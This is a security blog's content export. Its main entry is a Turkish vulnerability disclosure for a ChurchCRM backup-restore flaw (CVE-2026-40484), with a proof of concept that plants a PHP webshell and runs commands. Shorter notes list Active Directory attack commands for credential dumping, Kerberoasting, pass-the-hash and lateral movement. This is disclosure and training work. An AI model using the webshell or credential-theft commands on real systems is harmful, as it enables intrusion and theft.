[{"content":" ⚠️ Uyarı: Bu makale yalnızca eğitim amaçlıdır. Lütfen yalnızca izinli sistemler üzerinde test yapın.\nEtkilenen Sistemler Etki Açık Türü ChurchCRM Kritik 9.1 Uzaktan Kod Çalıştırma Giriş Merhabalar herkese. Bu makalede, CVE-2026-40484 açığını ilk andan itibaren nasıl bulduğumu ve bu açığın MITRE veritabanında nasıl resmi olarak kaydedilip yayınlandığını sizlerle paylaşacağım.\nİşe Başlangıç En üst seviye Türk akreditasyonunu alabilmek için şartlardan biri, adıma kayıtlı en az bir CVE bulunması gerektiğidir. Bu yüzden, mümkün olan en kısa sürede bir CVE çıkarabileceğim sistemleri bulmak için bir araştırma yolculuğuna çıkmam gerekiyordu.\nGitHub \u0026lsquo;a girdim ve geliştirme sürecinde güvenlik konusuna gerçekten önem veren projelere göz gezdirmeye başladım. Gözüm ChurchCRM adlı bir projeye takıldı.\nProjede daha önce bulunmuş açıklara baktığımda, birisinin zaten bir Remote Code Execution açığı bildirdiğini gördüm. Ben bu projede kendi araştırmama başlamadan önce keşfedilmiş olan açığın bağlantısı şu:\nhttps://github.com/ChurchCRM/CRM/security/advisories/GHSA-pqm7-g8px-9r77\nBu açık 17 Aralık 2025 tarihinde bildirilmiş.\nHer güvenlik araştırmacısının aklında tutması gereken önemli bir nokta var: kapatılmış açıklar aslında yeni açıkları keşfetmenin kapısını açabilir. Bu yüzden bu bölgeler odaklanılması gereken en önemli yerlerden biridir. \u0026ldquo;Burada zaten bir açık bulunmuş ve düzeltilmiş, başka bir şey çıkmaz\u0026rdquo; tuzağına düşmeyin. Bu tamamen yanlış bir düşüncedir. Aksine, bug avına çıkarken ilk bakmanız gereken yer tam olarak burası olmalı derim.\nBuna dayanarak, bu fonksiyonu projede bulmaya çalışmaya ve olası açıklar için incelemeye başladım.\nBazı filtreleme komutlarıyla ve projenin klasör ve dosyalarını gezerek, içinde PHP ile yazılmış birkaç dosya bulunan bir backup klasörü buldum.\nBu dosyaları analiz edip içindeki fonksiyonları anladıktan sonra, yine Uzaktan Kod Çalıştırma\u0026lsquo;ya yol açan bir açığa ulaşmayı başardım. Şimdi bu açığın detaylarını birlikte inceleyelim.\nAçığın Detayları ChurchCRM sürüm 7.1.1, veritabanı yedekleme geri yükleme fonksiyonunda kritik bir güvenlik açığı içeriyor. Bir yönetici geri yüklemek için bir yedekleme arşiv dosyasını (.tar.gz) yüklediğinde, uygulama arşivi çıkarıyor ve Images/ klasörünün içeriğini doğrudan web üzerinden erişilebilir olan doküman köküne kopyalıyor. Bu işlem için FileSystemUtils::recursiveCopyDirectory() fonksiyonunu kullanıyor.\nSorun şu ki, bu fonksiyon kopyalama işlemi sırasında dosya uzantıları üzerinde hiçbir filtreleme yapmıyor. Yani, Images/ klasörünün içine zararlı bir PHP betiği yerleştirilmiş kötü niyetli bir .tar.gz yedekleme arşivi hazırlayan bir saldırgan, uygulamanın bu dosyayı /Images/Person/ veya /Images/Family/ altındaki herkese açık bir yola yazmasını sağlayabiliyor. Dosya yazıldıktan sonra saldırgan, oluşturulan dosyaya HTTP istekleri göndererek web sunucusu sürecinin (www-data) yetkileriyle rastgele işletim sistemi komutları çalıştırabiliyor.\nKonuyu daha iyi anlamak için açığın bulunduğu dosyayı analiz etmeye başlayalım.\nAçığın Yeri Dosya adı: RestoreJob.php Açığın bulunduğu satır: 138 Yardımcı dosya: FileSystemUtils.php Açığın bulunduğu fonksiyon: FileSystemUtils::recursiveCopyDirectory() Dosya İncelemesi RestoreJob.php Dosyasının İncelenmesi Ne yaptığını anlamak için dosyayı satır satır ayıralım:\nSatır 122: Log kaydına yedekleme geri yüklemeye başladığını yazıyor. Satır 123: Yedekleme dosyasını (arşivi) açıyor. Satır 126: Dosyaları çıkaracağı rastgele isimli geçici bir klasör yolu hazırlıyor. Satır 127: Klasörü fiilen dosya sisteminde oluşturuyor. Satır 130: Sıkıştırılmış dosyanın tüm içeriğini bu geçici klasörün içine boşaltıyor. Satır 132: Çıkarılan dosyaların içindeki veritabanı dosyasının (SQL) konumunu tespit ediyor. Satır 133: Veritabanı dosyasının gerçekten var olup olmadığını doğruluyor. Satır 134: Yeni veri dosyasını sisteme yüklemeye başlıyor. Satır 136: Aşağıdaki yolda bulunan eski resimlerin hepsini siliyor: SystemURLs::getDocumentRoot() . '/Images' Satır 138: Resimleri geçici klasörden alıp sitenin nihai yoluna gönderiyor: SystemURLs::getImagesRoot() Ve burada FileSystemUtils::recursiveCopyDirectory fonksiyonunu çağırıyor. Bu fonksiyon klasörü ve içindeki tüm dosya ve resimleri özyinelemeli (recursive) ve otomatik olarak kopyalama işini üstleniyor.\nSatır 141: Eğer veri dosyası bulunamazsa, dosyanın eksik olduğunu belirten bir hata mesajı fırlatıyor. Buraya kadar her şey yolunda. Klasörü oluşturduktan sonra kod, kopyalama işini yapmak için şu fonksiyonu kullandı:\nFileSystemUtils::recursiveCopyDirectory Bu fonksiyonu bulmaya çalıştığımda karşıma şu çıktı:\nGördüğünüz gibi, bu yolda bulunuyor.\nFileSystemUtils.php Dosyasının İncelenmesi Fonksiyonu anlamak için kopyalama işlemini nasıl gerçekleştirdiğini görmemiz gerekiyor. 24. satıra gittiğimizde fonksiyonun kendisini buluyoruz ve çalışma mantığını şu şekilde analiz edebiliriz:\nSatır 28: if (file_exists($dst)) Çakışmayı önlemek için hedef yolun sunucuda zaten var olup olmadığını kontrol ediyor.\nSatır 29: self::recursiveRemoveDirectory($dst); Eğer bulursa, yeni kopya için yer hazırlamak amacıyla içindeki her şeyle birlikte tamamen siliyor.\nSatır 31: if (is_dir($src)) Kaynak yolu inceliyor; bu bir klasör mü? (Eğer öyleyse içeriğini işlemeye başlıyor.)\nSatır 32: mkdir($dst); Hedefte kaynak klasörle aynı isimde yeni bir klasör oluşturuyor.\nSatır 33: $files = scandir($src); Klasörü açıyor ve içindeki tüm dosya ve dizinlerin isimlerini okuyor.\nSatır 34: foreach ($files as $file) Bir önceki adımda bulunan her öğe üzerinde dönmek için bir döngü başlatıyor.\nSatır 35: if ($file != '.' \u0026amp;\u0026amp; $file != '..') Mevcut klasörü ve üst klasörü temsil eden teknik sembolleri görmezden geliyor. Böylece sonsuz bir döngüye girmenin önüne geçiliyor.\nSatır 36: self::recursiveCopyDirectory(\u0026quot;$src/$file\u0026quot;, \u0026quot;$dst/$file\u0026quot;); Özyineleme (Recursion): Burada fonksiyon kendi kendisini çağırarak alt klasörlere girip aynı adımları tekrarlıyor.\nSatır 39: } elseif (file_exists($src)) { Eğer yol bir klasör değilse, gerçekten var olan bir dosya olduğundan emin oluyor.\nSatır 40: copy($src, $dst); Dosyayı kaynaktan hedefe olduğu gibi kopyalıyor.\nGüvenlik Analizi 1. Kör Kopyalama İşlemi\nFonksiyon \u0026ldquo;ne kopyalıyorum?\u0026rdquo; diye sormuyor, sadece kopyalama komutunu yerine getiriyor. Dosyanın içeriği (MIME Type) üzerinde hiçbir kontrol yok; dosyanın gerçek bir resim mi yoksa kılık değiştirmiş bir kod parçası mı olduğuna dair hiçbir doğrulama da yapılmıyor.\n2. Uzantı Kontrolünün Olmaması\nAsıl felaket burada yatıyor; fonksiyon uzantısı ne olursa olsun her dosyayı kopyalıyor. Bir saldırgan, yedekleme dosyasının içine şuna benzer tehlikeli dosyalar tıkıştırabilir:\n.php .phtml .phar .php5 Fonksiyonun uzantılar için ne bir \u0026ldquo;kara liste\u0026rdquo; (Blacklist) ne de \u0026ldquo;beyaz liste\u0026rdquo; (Whitelist) bulunduğundan, bu dosyaları doğrudan sitenin canlı klasörüne taşıyacaktır.\nBir saldırgan olarak aklınıza ilk gelen şey, sistemi tamamen ele geçirmek için PHP uzantılı zararlı dosyalar yükleyebileceğiniz olur :)\nAçığın İstismar Şartları Fonksiyonları ve çalışma mantığını anladığımıza göre, artık bu açığı başarıyla istismar etmek için gereken şartları belirleyebiliriz:\n1. Veritabanı dosyasının varlığı (ChurchCRM-Database.sql)\nSebep: Önceki kodda gördüğümüz gibi (satır 133 ve 141), sistem özellikle bu dosyanın varlığını kontrol ediyor. Taktik: Kod bu dosyayı bulamazsa bir istisna (Exception) fırlatacak ve geri yükleme işlemi hemen duracaktır. Bu nedenle saldırgan, sistemi kandırıp çalışmaya devam etmesini sağlamak için bir SQL dosyası (boş ya da rastgele veri içeren bir dosya bile olsa) dahil etmek zorundadır. 2. Uzantı Kontrolünü Atlatmak (PHP Web Shell Injection)\nSebep: recursiveCopyDirectory fonksiyonu kör; her şeyi kopyalıyor. Taktik: Saldırgan, sıkıştırılmış arşivdeki resimler klasörünün (/Images) içine bir shell.php dosyası yerleştiriyor. Fonksiyonun uzantılar için bir kara listesi olmadığından, shell dosyası açılacak ve sitenin canlı klasörüne yerleştirilecektir. 3. Canlı Yola Ulaşmak (Predictable Path)\nSebep: Saldırganın dosyasının nereye yerleştirildiğini bilmesi gerekiyor. Taktik: Kodun dosyaları SystemURLs::getImagesRoot() konumuna kopyaladığını bildiğimizden, yol saldırgan için önceden bilinmektedir. Ve bilmemiz gereken son bir şey var: bu fonksiyonu nasıl çağırabiliriz? Bunun için API\u0026rsquo;ler arasında bu fonksiyonu tetikleyebileceğimiz isteği aramamız gerekiyor.\nBuradan da anlaşılıyor ki, şu yolu kullanarak /api/database/restore bu fonksiyonu başarıyla çağırıp çalıştırabiliyoruz.\nEtki www-data kullanıcısının yetkileriyle keyfi işletim sistemi komutlarının çalıştırılması. Sunucu ortamı içinde yatay hareket (Lateral Movement). Kalıcı bir arka kapı; bırakılan shell dosyası uygulama yeniden başlatıldıktan sonra bile yerinde kalıyor. CRM verilerinin gizliliği, bütünlüğü ve kullanılabilirliğinin tamamen ihlali. Konsept Kanıtı (Proof of Concept) Öncelikle, şunları içeren sıkıştırılmış bir dosya oluşturmamız gerekiyor:\nChurchCRM-Database.sql /Images/Person/shell.php Bunun için aşağıdaki kodu kullanabiliriz:\nmkdir -p evil_backup/Images/Person echo \u0026#34;SQL backup Test\u0026#34; \u0026gt; evil_backup_test/ChurchCRM-Database.sql # PHP dilinde bir arka kapı oluşturma echo \u0026#39;\u0026lt;?php system($_GET[\u0026#34;cmd\u0026#34;]); ?\u0026gt;\u0026#39; \u0026gt; evil_backup_test/Images/Person/shell.php # Dosyayı sıkıştırma cd evil_backup tar -czf /tmp/evil_restore_test.tar.gz ChurchCRM-Database.sql Images/ Dosya yapısı:\nChurchCRM-Database.sql Images/ Images/Person/ Images/Person/shell.php ← PHP webshell İkinci olarak, API üzerinden yükleme:\ncurl -s \\ -b \u0026#34;CRM-SESSION=\u0026lt;session_cookie\u0026gt;\u0026#34; \\ \u0026#34;http://localhost/churchcrm/api/database/restore\u0026#34; \\ -X POST \\ -F \u0026#34;restoreFile=@/tmp/evil_restore_test.tar.gz;type=application/gzip\u0026#34; Sunucunun cevabı şu şekilde olacak: HTTP 200\n{ \u0026#34;Messages\u0026#34;: [ \u0026#34;As part of the restore, external backups have been disabled...\u0026#34; ] } Bundan sonra, zararlı dosya aşağıdaki yola yüklenmiş olacak:\nImages/Person/shell.php Ve bu konuma bir istek göndermeye çalıştığımız anda, uzaktan kod çalıştırmayı başarıyla gerçekleştirebildiğimizi göreceğiz!\ncurl \u0026#34;http://localhost/churchcrm/Images/Person/shell.php?cmd=id\u0026#34; Çıktı:\nuid=33(www-data) gid=33(www-data) groups=33(www-data) Görsellerle Konsept Kanıtı 1. Sıkıştırılmış dosyayı oluşturma:\n2. Dosyayı yükleme ve başarıyla yüklendiğini doğrulama:\n3. id komutunun çalıştırılması:\nAçığın Kapatılması Açığı kapatmak için tüm detaylar ve kodlar aşağıdaki commit içine eklendi:\nhttps://github.com/ChurchCRM/CRM/commit/68be1d12bc4cc1429575ae797ef05efe47030d39\nKaynaklar Authenticated Remote Code Execution via Unrestricted PHP File Write in Database Restore Function NIST-NVD: CVE-2026-40484 Detail The Hacker Wire: CVE-2026-40484 CVE: CVE-2026-40484 ","permalink":"https://cyberah-blog.pages.dev/tr/cve/cve-2026-40484/","summary":"\u003cblockquote\u003e\n\u003cp\u003e⚠️ \u003cstrong\u003eUyarı:\u003c/strong\u003e Bu makale yalnızca eğitim amaçlıdır. Lütfen yalnızca izinli sistemler üzerinde test yapın.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ctable\u003e\n  \u003cthead\u003e\n      \u003ctr\u003e\n          \u003cth\u003eEtkilenen Sistemler\u003c/th\u003e\n          \u003cth\u003eEtki\u003c/th\u003e\n          \u003cth\u003eAçık Türü\u003c/th\u003e\n      \u003c/tr\u003e\n  \u003c/thead\u003e\n  \u003ctbody\u003e\n      \u003ctr\u003e\n          \u003ctd\u003eChurchCRM\u003c/td\u003e\n          \u003ctd\u003e\u003ccode\u003eKritik 9.1\u003c/code\u003e\u003c/td\u003e\n          \u003ctd\u003eUzaktan Kod Çalıştırma\u003c/td\u003e\n      \u003c/tr\u003e\n  \u003c/tbody\u003e\n\u003c/table\u003e\n\u003ch2 id=\"giriş\"\u003eGiriş\u003c/h2\u003e\n\u003cp\u003eMerhabalar herkese. Bu makalede, \u003cstrong\u003eCVE-2026-40484\u003c/strong\u003e açığını ilk andan itibaren nasıl bulduğumu ve bu açığın \u003cstrong\u003eMITRE\u003c/strong\u003e veritabanında nasıl resmi olarak kaydedilip yayınlandığını sizlerle paylaşacağım.\u003c/p\u003e\n\u003ch2 id=\"işe-başlangıç\"\u003eİşe Başlangıç\u003c/h2\u003e\n\u003cp\u003eEn üst seviye Türk akreditasyonunu alabilmek için şartlardan biri, adıma kayıtlı en az bir \u003cstrong\u003eCVE\u003c/strong\u003e bulunması gerektiğidir. Bu yüzden, mümkün olan en kısa sürede bir CVE çıkarabileceğim sistemleri bulmak için bir araştırma yolculuğuna çıkmam gerekiyordu.\u003c/p\u003e","title":"Veritabanı Geri Yükleme Fonksiyonunda Uzaktan Kod Çalıştırma Açığını Nasıl Buldum - CVE-2026-40484"},{"content":"Active Directory (AD) is a directory service developed by Microsoft, used in Windows networks to centrally manage users, computers, and permissions.\nWhat is Active Directory? AD is a centralized database containing information about every user and computer in the network. The main server running it is called a Domain Controller (DC).\nForest └── Domain (cyberah.local) ├── Users ├── Computers ├── Groups └── OUs (Organizational Units) How Does Kerberos Work? Kerberos is the primary authentication protocol in Active Directory, based on a ticket system.\nAuthentication Flow The user requests a ticket from the KDC (Key Distribution Center) The KDC verifies identity and issues a TGT (Ticket Granting Ticket) The user uses the TGT to request service tickets # View current tickets klist # Request a ticket kinit user@DOMAIN.LOCAL What is the Ticket System? Two main ticket types in Kerberos:\nType Name Description TGT Ticket Granting Ticket Master authentication ticket TGS Ticket Granting Service Service-specific access ticket Note: The TGT is encrypted with the krbtgt account\u0026rsquo;s key and cannot be read directly.\n","permalink":"https://cyberah-blog.pages.dev/tr/notes/active-directory/what-is-ad/","summary":"\u003cp\u003eActive Directory (AD) is a directory service developed by Microsoft, used in Windows networks to centrally manage users, computers, and permissions.\u003c/p\u003e\n\u003ch2 id=\"what-is-active-directory\"\u003eWhat is Active Directory?\u003c/h2\u003e\n\u003cp\u003eAD is a centralized database containing information about every user and computer in the network. The main server running it is called a \u003cstrong\u003eDomain Controller (DC)\u003c/strong\u003e.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-fallback\" data-lang=\"fallback\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eForest\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e└── Domain (cyberah.local)\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    ├── Users\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    ├── Computers\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    ├── Groups\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    └── OUs (Organizational Units)\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"how-does-kerberos-work\"\u003eHow Does Kerberos Work?\u003c/h2\u003e\n\u003cp\u003eKerberos is the primary authentication protocol in Active Directory, based on a \u003cstrong\u003eticket system\u003c/strong\u003e.\u003c/p\u003e","title":"What is Active Directory?"},{"content":"Active Directory is the most targeted system in internal penetration tests. Understanding its attacks is essential for any Red Team professional.\nKerberoasting Kerberoasting targets Service Accounts in Active Directory to crack their password hashes offline.\nHow It Works # Extract service tickets GetUserSPNs.py -request -dc-ip 192.168.1.1 domain/user # Crack offline hashcat -m 13100 hashes.txt wordlist.txt Defense Use long service account passwords (25+ characters) Enable LAPS for local password management Monitor Event ID 4769 Active Directory Privilege Escalation Pass-the-Hash (PtH) # Mimikatz — extract hashes privilege::debug sekurlsa::logonpasswords # Pass the hash sekurlsa::pth /user:Administrator /domain:lab.local /ntlm:HASH DCSync # Dump all domain hashes secretsdump.py -just-dc domain/user:password@dc-ip Warning: These tools are for authorized testing environments only.\n","permalink":"https://cyberah-blog.pages.dev/tr/notes/active-directory/ad-attacks/","summary":"\u003cp\u003eActive Directory is the most targeted system in internal penetration tests. Understanding its attacks is essential for any Red Team professional.\u003c/p\u003e\n\u003ch2 id=\"kerberoasting\"\u003eKerberoasting\u003c/h2\u003e\n\u003cp\u003eKerberoasting targets \u003cstrong\u003eService Accounts\u003c/strong\u003e in Active Directory to crack their password hashes offline.\u003c/p\u003e\n\u003ch3 id=\"how-it-works\"\u003eHow It Works\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Extract service tickets\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eGetUserSPNs.py -request -dc-ip 192.168.1.1 domain/user\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Crack offline\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ehashcat -m \u003cspan class=\"m\"\u003e13100\u003c/span\u003e hashes.txt wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"defense\"\u003eDefense\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUse long service account passwords (25+ characters)\u003c/li\u003e\n\u003cli\u003eEnable \u003cstrong\u003eLAPS\u003c/strong\u003e for local password management\u003c/li\u003e\n\u003cli\u003eMonitor Event ID \u003ccode\u003e4769\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"active-directory-privilege-escalation\"\u003eActive Directory Privilege Escalation\u003c/h2\u003e\n\u003ch3 id=\"pass-the-hash-pth\"\u003ePass-the-Hash (PtH)\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c\"\u003e# Mimikatz — extract hashes\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"n\"\u003eprivilege\u003c/span\u003e\u003cspan class=\"p\"\u003e::\u003c/span\u003e\u003cspan class=\"n\"\u003edebug\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"n\"\u003esekurlsa\u003c/span\u003e\u003cspan class=\"p\"\u003e::\u003c/span\u003e\u003cspan class=\"n\"\u003elogonpasswords\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c\"\u003e# Pass the hash\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"n\"\u003esekurlsa\u003c/span\u003e\u003cspan class=\"p\"\u003e::\u003c/span\u003e\u003cspan class=\"n\"\u003epth\u003c/span\u003e \u003cspan class=\"p\"\u003e/\u003c/span\u003e\u003cspan class=\"n\"\u003euser\u003c/span\u003e\u003cspan class=\"err\"\u003e:\u003c/span\u003e\u003cspan class=\"n\"\u003eAdministrator\u003c/span\u003e \u003cspan class=\"p\"\u003e/\u003c/span\u003e\u003cspan class=\"n\"\u003edomain\u003c/span\u003e\u003cspan class=\"err\"\u003e:\u003c/span\u003e\u003cspan class=\"n\"\u003elab\u003c/span\u003e\u003cspan class=\"p\"\u003e.\u003c/span\u003e\u003cspan class=\"py\"\u003elocal\u003c/span\u003e \u003cspan class=\"p\"\u003e/\u003c/span\u003e\u003cspan class=\"n\"\u003entlm\u003c/span\u003e\u003cspan class=\"err\"\u003e:\u003c/span\u003e\u003cspan class=\"n\"\u003eHASH\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"dcsync\"\u003eDCSync\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Dump all domain hashes\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esecretsdump.py -just-dc domain/user:password@dc-ip\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eWarning:\u003c/strong\u003e These tools are for authorized testing environments only.\u003c/p\u003e","title":"Active Directory Attacks"},{"content":"Lateral movement, ele geçirilen bir makineden ağdaki diğer makinelere geçiş yapmak anlamına gelir.\nPsExec Klasik uzaktan komut çalıştırma aracı.\nimpacket-psexec corp.local/admin:pass@10.10.10.2 cmd.exe WMI Exec PsExec\u0026rsquo;e göre daha sessiz alternatif.\nimpacket-wmiexec corp.local/admin:pass@10.10.10.2 SMB / Pass-the-Hash # Düz metin şifre gerekmez — NTLM hash yeterli crackmapexec smb 10.10.10.0/24 -u admin -H NTLM_HASH Not: Bu araçlar Windows Event Logs\u0026rsquo;ta iz bırakır (4624, 4648).\n","permalink":"https://cyberah-blog.pages.dev/tr/notes/active-directory/lateral-movement/","summary":"\u003cp\u003eLateral movement, ele geçirilen bir makineden ağdaki diğer makinelere geçiş yapmak anlamına gelir.\u003c/p\u003e\n\u003ch2 id=\"psexec\"\u003ePsExec\u003c/h2\u003e\n\u003cp\u003eKlasik uzaktan komut çalıştırma aracı.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eimpacket-psexec corp.local/admin:pass@10.10.10.2 cmd.exe\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"wmi-exec\"\u003eWMI Exec\u003c/h2\u003e\n\u003cp\u003ePsExec\u0026rsquo;e göre daha sessiz alternatif.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eimpacket-wmiexec corp.local/admin:pass@10.10.10.2\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"smb--pass-the-hash\"\u003eSMB / Pass-the-Hash\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Düz metin şifre gerekmez — NTLM hash yeterli\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ecrackmapexec smb 10.10.10.0/24 -u admin -H NTLM_HASH\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eNot:\u003c/strong\u003e Bu araçlar Windows Event Logs\u0026rsquo;ta iz bırakır (4624, 4648).\u003c/p\u003e\n\u003c/blockquote\u003e","title":"AD Ağlarında Lateral Movement"},{"content":"BloodHound, Active Directory ilişkilerini analiz ederek Domain Admin\u0026rsquo;e en kısa yolu haritalandırır.\nVeri Toplama # SharpHound — alan adından veri topla ./SharpHound.exe -c All # Python ile (hedef üzerinde çalıştırmadan) bloodhound-python -u user -p pass -d corp.local -dc dc.corp.local -c All Sonuçları Analiz Etme ZIP dosyalarını BloodHound GUI\u0026rsquo;ye yükledikten sonra:\nShortest Path to Domain Admin yolunu bul ACL Abuse yollarını incele Kerberoastable Users listesini gözden geçir İpucu: BloodHound, saatlik manuel analizi ortadan kaldırır ve gizli saldırı yollarını ortaya çıkarır.\n","permalink":"https://cyberah-blog.pages.dev/tr/notes/active-directory/bloodhound/","summary":"\u003cp\u003eBloodHound, Active Directory ilişkilerini analiz ederek Domain Admin\u0026rsquo;e en kısa yolu haritalandırır.\u003c/p\u003e\n\u003ch2 id=\"veri-toplama\"\u003eVeri Toplama\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# SharpHound — alan adından veri topla\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e./SharpHound.exe -c All\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Python ile (hedef üzerinde çalıştırmadan)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ebloodhound-python -u user -p pass -d corp.local -dc dc.corp.local -c All\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"sonuçları-analiz-etme\"\u003eSonuçları Analiz Etme\u003c/h2\u003e\n\u003cp\u003eZIP dosyalarını BloodHound GUI\u0026rsquo;ye yükledikten sonra:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eShortest Path to Domain Admin\u003c/strong\u003e yolunu bul\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eACL Abuse\u003c/strong\u003e yollarını incele\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eKerberoastable Users\u003c/strong\u003e listesini gözden geçir\u003c/li\u003e\n\u003c/ol\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eİpucu:\u003c/strong\u003e BloodHound, saatlik manuel analizi ortadan kaldırır ve gizli saldırı yollarını ortaya çıkarır.\u003c/p\u003e","title":"BloodHound — Saldırı Yollarını Haritalama"},{"content":"","permalink":"https://cyberah-blog.pages.dev/tr/stats/","summary":"","title":"Blog İstatistikleri"},{"content":"","permalink":"https://cyberah-blog.pages.dev/tr/hall-of-fame/","summary":"","title":"Şöhretler Salonu"},{"content":" ⚡ Cyberah Ayham Othman — Sızma Testi Uzmanı | Güvenlik Araştırmacısı | Eğitmen 5+ CVE OSCP OSWE 3+ Yıl Deneyim Hakkımda Siber güvenlik topluluğunda Cyberah lakabıyla tanınan Ayham Othman, üç yılı aşkın deneyime sahip deneyimli bir sızma testi uzmanıdır. Yerel ve uluslararası şirketler için gelişmiş sızma testleri ve Red Team operasyonları yürütmektedir.\nOSCP, OSWE ve eWPTXv2 gibi dünya genelinde tanınan sertifikaların yanı sıra Türk Standartları Enstitüsü siber güvenlik sertifikasına da sahiptir. Aralarında kritik Remote Code Execution açıklarının da bulunduğu 5\u0026rsquo;ten fazla yayımlanmış CVE ile güçlü bir güvenlik araştırma geçmişine sahiptir.\nSaha çalışmalarının yanı sıra Türkiye, Yemen ve Suriye\u0026rsquo;de konferans ve atölyelerde yüzlerce öğrenciye eğitim vermiş, konuşmalar yapmıştır. YouTube ve Instagram\u0026rsquo;da aktif bir içerik üreticisi olarak bilgi ve deneyimlerini paylaşmaktadır.\n🏆 Sertifikalar OSCP Offensive Security Certified Professional OSWE Offensive Security Web Expert 